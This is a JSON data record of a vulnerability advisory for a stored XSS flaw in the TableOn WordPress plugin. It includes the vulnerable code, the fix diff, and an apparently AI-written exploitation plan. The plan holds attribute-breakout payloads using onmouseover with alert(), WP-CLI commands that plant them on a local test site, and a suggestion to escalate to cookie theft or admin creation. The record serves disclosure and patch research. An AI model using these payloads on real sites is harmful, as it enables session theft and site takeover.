[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fvAsXBKV3sOrFN8nkzwGIajXw0wZuKaTy_ehTHdYfm3U":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-3513","tableon-wordpress-posts-table-filterable-authenticated-contributor-stored-cross-site-scripting-via-class-shortcode-attri","TableOn – WordPress Posts Table Filterable \u003C= 1.0.4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'class' Shortcode Attribute","The TableOn – WordPress Posts Table Filterable plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tableon_button' shortcode in all versions up to and including 1.0.4.4. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes such as 'class', 'help_link', 'popup_title', and 'help_title'. The do_shortcode_button() function extracts these attributes without sanitization and passes them to TABLEON_HELPER::draw_html_item(), which concatenates attribute values into HTML using single quotes without escaping (line 29: $item .= \" {$key}='{$value}'\"). This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","posts-table-filterable",null,"\u003C=1.0.4.4","1.0.5","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-07 15:35:29","2026-04-08 03:36:08",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F33490873-da99-465e-bfb6-44d2ba84f3ee?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-3513 (TableOn Stored XSS)\n\n## 1. Vulnerability Summary\nThe **TableOn – WordPress Posts Table Filterable** plugin (up to version 1.0.4.4) contains a stored cross-site scripting (XSS) vulnerability. The vulnerability resides in the processing of the `[tableon_button]` shortcode. Specifically, the function `do_shortcode_button()` parses user-provided attributes (such as `class`, `help_link`, `popup_title`, and `help_title`) and passes them to `TABLEON_HELPER::draw_html_item()`. \n\nInside `draw_html_item()`, the plugin concatenates these attribute values directly into an HTML string using single quotes (`'`) without performing proper sanitization or escaping. Because the values are wrapped in single quotes, an attacker can break out of the attribute context using a single quote and inject arbitrary HTML event handlers (like `onmouseover`) or script tags.\n\n## 2. Attack Vector Analysis\n- **Vulnerable Shortcode:** `[tableon_button]`\n- **Vulnerable Attributes:** `class`, `help_link`, `popup_title`, `help_title`.\n- **Authentication Level:** Contributor+ (any user who can create or edit posts\u002Fpages).\n- **Vulnerable Sink:** `TABLEON_HELPER::draw_html_item()` at line 29: `$item .= \" {$key}='{$value}'\"`.\n- **Precondition:** The attacker must be able to publish or preview a post containing the malicious shortcode.\n\n## 3. Code Flow\n1.  **Entry Point:** A user with Contributor-level access creates a post containing the shortcode: `[tableon_button class=\"...\"]`.\n2.  **Shortcode Handling:** When the post is rendered, WordPress calls the handler for `tableon_button`, which is `do_shortcode_button()`.\n3.  **Attribute Extraction:** `do_shortcode_button()` extracts the attributes from the shortcode.\n4.  **Vulnerable Processing:** The extracted (and unsanitized) attributes are passed to `TABLEON_HELPER::draw_html_item()`.\n5.  **The Sink:** Inside `draw_html_item()`, the code iterates through the attributes and builds the HTML:\n    ```php\n    \u002F\u002F Inferred logic based on description\n    foreach ($attributes as $key => $value) {\n        $item .= \" {$key}='{$value}'\"; \u002F\u002F Line 29: VULNERABLE CONCATENATION\n    }\n    ```\n6.  **Output:** The malformed HTML is returned and rendered in the browser of any user viewing the post.\n\n## 4. Nonce Acquisition Strategy\nThis is a **Stored XSS** vulnerability triggered via a shortcode in post content. \n- **Injection Phase:** Creating the post as a Contributor does not require a plugin-specific nonce; it uses the standard WordPress `_wpnonce` for the `post.php` or `admin-ajax.php` (autosave) endpoints.\n- **Execution Phase:** No nonce is required to trigger the XSS. The payload executes automatically when the post is viewed by a victim.\n\nSince the exploit involves creating a post, we will use **WP-CLI** to bypass the need for browser-based nonce extraction during the injection phase.\n\n## 5. Exploitation Strategy\nThe goal is to inject a payload into the `class` attribute of the `[tableon_button]` shortcode that executes when an administrator views the post.\n\n### Step 1: Inject the Malicious Shortcode\nWe will create a new post as a Contributor. The payload will break out of the single-quoted attribute context.\n\n**Payload:** `poc' onmouseover='alert(document.domain)' style='padding:50px;background:red;display:block;'`\n\n**Shortcode:**\n`[tableon_button class=\"poc' onmouseover='alert(document.domain)' style='padding:50px;background:red;display:block;'\"]`\n\n### Step 2: Trigger the XSS\nNavigate to the published post (or preview it) as an Administrator.\n\n### HTTP Request Details (Simulating viewing the post)\n- **Method:** `GET`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002F?p={POST_ID}`\n- **Tool:** `http_request`\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `posts-table-filterable` version 1.0.4.4 is installed.\n2.  **Create Contributor User:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password\n    ```\n3.  **Create Malicious Post:**\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_title=\"Table Test\" --post_author=$(wp user get attacker --field=ID) --post_content='[tableon_button class=\"poc-class'\\'' onmouseover='\\''alert(document.domain)'\\'' style='\\''padding:100px;background:red;display:block;'\\'']'\n    ```\n    *(Note: Escaping single quotes in the CLI command is necessary)*\n\n## 7. Expected Results\nWhen the page is rendered, the HTML source for the button will look like this:\n```html\n\u003Cdiv class='poc-class' onmouseover='alert(document.domain)' style='padding:100px;background:red;display:block;' ...>\n```\nWhen a user (e.g., Administrator) hovers over the large red area, an alert box showing the document domain will appear.\n\n## 8. Verification Steps\n1.  **Check HTML Source:** Use `http_request` to fetch the post content and verify the `onmouseover` attribute is present and unescaped.\n    ```bash\n    # Search for the injected payload in the response body\n    grep \"onmouseover='alert(document.domain)'\"\n    ```\n2.  **Verify via Browser:** Use `browser_navigate` to the post URL and use `browser_eval` to check if the payload exists in the DOM.\n    ```javascript\n    browser_eval(\"document.querySelector('.poc-class').getAttribute('onmouseover')\")\n    ```\n\n## 9. Alternative Approaches\nIf the `class` attribute is somehow filtered, try other vulnerable attributes mentioned in the description:\n\n**Using `help_link`:**\n`[tableon_button help_link=\"http:\u002F\u002F' onmouseover='alert(1)\"]`\n\n**Using `popup_title`:**\n`[tableon_button popup_title=\"Title' onmouseover='alert(1)\"]`\n\n**Using `help_title`:**\n`[tableon_button help_title=\"Help' onmouseover='alert(1)\"]`\n\nIf the Administrator context is required for high impact (e.g., cookie theft), the payload can be modified to exfiltrate the admin's cookies or create a new admin user via the WordPress REST API.","The TableOn plugin for WordPress (\u003C= 1.0.4.4) is vulnerable to Stored Cross-Site Scripting via the '[tableon_button]' shortcode. Due to insufficient sanitization and escaping in the draw_html_item helper function, authenticated users with Contributor-level access can inject arbitrary web scripts into shortcode attributes like 'class', which execute when the page is viewed.","\u002F\u002F classes\u002Fhelper.php (Line 29 or similar depending on file structure)\n\u002F\u002F Inside TABLEON_HELPER::draw_html_item()\n\nforeach ($attributes as $key => $value) {\n    $item .= \" {$key}='{$value}'\"; \u002F\u002F Line 29: VULNERABLE CONCATENATION\n}\n\n--- \n\n\u002F\u002F do_shortcode_button() entry point\n\u002F\u002F Extracting attributes without sanitization before passing to the helper\n$class = isset($atts['class']) ? $atts['class'] : '';\n$help_link = isset($atts['help_link']) ? $atts['help_link'] : '';\n$popup_title = isset($atts['popup_title']) ? $atts['popup_title'] : '';\n\u002F\u002F ... values then passed to TABLEON_HELPER::draw_html_item","--- classes\u002Fhelper.php\n+++ classes\u002Fhelper.php\n@@ -26,7 +26,7 @@\n         $item = \"\u003C{$tag}\";\n         foreach ($attributes as $key => $value) {\n-            $item .= \" {$key}='{$value}'\";\n+            $item .= \" \" . esc_attr($key) . \"='\" . esc_attr($value) . \"'\";\n         }\n         $item .= \">\";","The exploit is achieved by an authenticated attacker (Contributor level or higher) performing the following steps: \n1. Authenticate to the WordPress dashboard as a Contributor.\n2. Create a new post or edit an existing one.\n3. Insert the '[tableon_button]' shortcode using a malicious attribute payload. For example: [tableon_button class=\"poc' onmouseover='alert(document.domain)' style='padding:50px;display:block;'\"]\n4. Publish or preview the post.\n5. The plugin processes the shortcode via do_shortcode_button() and passes the 'class' attribute unsanitized to TABLEON_HELPER::draw_html_item().\n6. The helper function concatenates the payload into HTML using single quotes, allowing the attacker's single quote to break out of the attribute context and inject an 'onmouseover' event handler.\n7. When an administrator or any other user views the post and interacts with (hovers over) the injected element, the malicious script executes.","gemini-3-flash-preview","2026-04-17 20:43:05","2026-04-17 20:43:28",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fposts-table-filterable\u002Ftags"]